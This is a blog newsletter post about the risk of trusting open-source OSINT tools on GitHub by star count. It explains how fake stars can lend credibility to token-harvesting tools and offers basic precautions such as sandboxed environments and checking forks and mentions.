Welcome to 2nd issue of OSINT Pros. This post is technical and it’s about the risks of trusting a open-source project on GitHub based on the number of stars it has.

Take a pause for minute and give your mind some relax. Now imagine you are scrolling twitter for updates, you came across a twitter post with the following annoucement-

“Announcing my new project, Email2Info, an open source that accepts email as an input and finds accounts associated with that email. It’s having 50+ modules and i am actively adding more. Give it a try at link.“

You are excited about it. You open the link, you saw it has 1.2k+ stars, that means it’s genuine. You install it locally and try running it in your Linux. It asks for sudo permission, you are so excited that you gave it the permission. It got installed successfully. You tried to run it, it shows error “Some tokens are missing. We need tokens for Instagram, Twitter, Github, etc to fetch detailed info about the user. Here’s how to get these tokens step by step. Link“

You are so excited you will follow step by step method and give it token. You tried running it again but now it shows a different error. Do you know why?

Here’s why it won’t be working. Because it was never the intention. Some open-source projects just exist for token harvesting. Let me give you an example again.

Last year, when we launched profiler.me, it used to have a tool, basic search which used to accept email and gives data about the associated accounts on Google, LinkedIn, GitHub, protonmail, gravatar and a few moer. Now, in order to keep this tool working, i used to update the LinkedIn token every 12 hours. (i used to update tokens for other platforms too at regular intervals of time but that’s not the point.)

It’s very boring, i used to hate it. Also, i used to get token from my own account again and again which is risky. What if i want to make it smooth. I can just launch a new osint tool, email2linkedin which gives you LinkedIn account by taking just an email, but you need to bring your own token. If this project will be having 5-10stars, you may not try it. But if this has 100+, i am sure 99% of the people will give it a try, they will install it, give it the needed token and will try it. Now, some tools does work and some doesn’t work depending on how much evil the developer is, but they will surely share that token to the developer of the tool some way. If I go this way, all my problems are sorted, instead of 1, i will be getting a lot of tokens from different account so just in case, one token doesn’t work, the other one will be used. Back to main topic.

This used to happen from a long time but it’s easier. We decided if a tool is good or bad, works or doesn’t work based on number of stars it has on GitHub. Here’s a interesting take on it -

A peer-reviewed CMU study (ICSE 2026) found 6 million fake stars across 18,617 repositories using 301,000 accounts - with AI/LLM repos the largest non-malicious category

- Stars sell for $0.03 to $0.85 each on at least a dozen websites, Fiverr gigs, and Telegram channels - no dark web required
-VCs explicitly use stars as sourcing signals: Redpoint found the median star count at seed is 2,850, and firms run automated scrapers to find fast-growing repos
- An independent analysis sampling 150 profiles per repo across 20 projects found repos where 36–76% of stargazers have zero followers and fork-to-star ratios 10x below organic baselines
- The FTC's 2024 rule banning fake social influence metrics carries penalties of $53,088 per violation — and the SEC has already charged startup founders for inflating traction metrics during fundraising.

In the above scenario, the fake stars have been used for a different purpose, i won’t be wrong if i say it’s being used for a lot of malicious reasons too like spreading malwares, token harvesting, etc.

If you want to read more on this topic, read GitHub Fake Stars Poison Open Source: 6M Stars for Sale.

Note - Gitpod.io has pivoted by the end of last year, so it’s a different product now, don’t waste your time in trying it out. I will find a alternative and mention that soon.

This is not something new. I have been aware of it from very long time. When i started by journey in learning cybersecurity, i came across this topic at that time itself. I used to use a online website, gitpod.io which gives a virtual terminal and ide running on a cloud, it used to have a free tier, which was more than enough for me. I used to use that for running any CLI based tool so that incase it contains a malware or something, it doesn’t affect me. Apart from this, i used to use Kali Linux in a VirtualBox which is just used for testing and learning. It contains nothing except this stuff, so there is nothing to lose incase something goes wrong, i just delete that instance and install a new machine in kali linux. One more solution is, instead of stars, pay attention to number of forks, search the name of project and see how many times it has been mentioned and by whom, if a tool hasn’t been mentioned on any trusted source. I usually don’t trust them. Rest, you can read the code if you understand the language it has been written it. But it can also have obsucation, so can’t say anything for sure. It’s a rat and mouse game.

Guys, your feedback matters a lot to me. Feedback is what helps me in understanding if i am writing on topics you are interested in or am just writing it for myself. Also, it helps me in understanding what can be improved. Is it the writing style? is it use of graphics or anything else. Please leave a comment on every post whether positive or negative, doesn’t matter. It will just take a minute of your time, but it gives me motivation to create more and better content.

Our club now has 7 people. Thanks to

Today i was chatting with someone on LinkedIn and i got following response -

At that time, i didn’t knew what the most appropriate answer would be. But now while writing this post, i realized what’s different. Perspective! you can get updates about osint from lot’s of sources. Anyone can do curation, i used to earlier too, it’s very easy. I want to focus on helping my readers achieve a new perspective about everything they do, mostly on OSINT but i will be writing a few posts on some other useful topics too.

I don't want to be part of the crowd copy pasting the same stuff from here and there. I used to be part of the crowd till last year. This year, I decided to change myself, now I am getting awesome results. I am very interested in writing a post on “How i changed my habits and perspective within three months? “, this will be including some real stories, scientific techniques and resources i used. Comment “Perspective “. if you want this to be next post. Otherwise, i will be writing next on Username OSINT as mentioned in last post.

Have a Good Day.